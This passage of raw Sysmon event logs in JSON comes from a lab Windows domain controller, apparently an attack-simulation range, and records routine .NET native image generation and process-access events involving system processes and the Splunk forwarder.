FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:44.740","ProcessGuid":"{41C8662E-22D0-5F25-0000-0010509D1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\dd0-0\\System.Drawing.dll","CreationUtcTime":"2020-08-01 08:07:44.740","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8447,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.787\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 2008\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22D0-5F25-0000-0010FEA31100}\r\nTargetProcessId: 2924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.787","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"2008","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22D0-5F25-0000-0010FEA31100}","TargetProcessId":"2924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8448,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.787\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22D0-5F25-0000-0010FEA31100}\r\nTargetProcessId: 2924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.787","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22D0-5F25-0000-0010FEA31100}","TargetProcessId":"2924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8449,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.803\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D0-5F25-0000-0010FEA31100}\r\nTargetProcessId: 2924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.803","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D0-5F25-0000-0010FEA31100}","TargetProcessId":"2924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8450,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.818\r\nSourceProcessGUID: {41C8662E-22D0-5F25-0000-00101CA21100}\r\nSourceProcessId: 2992\r\nSourceThreadId: 1328\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.818","SourceProcessGUID":"{41C8662E-22D0-5F25-0000-00101CA21100}","SourceProcessId":"2992","SourceThreadId":"1328","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8451,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.240\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 4808\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010F1551000}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.240","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"4808","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010F1551000}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8452,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.240\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010F1551000}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.240","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010F1551000}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8453,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.256\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-00109FA81100}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.256","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-00109FA81100}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8454,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\n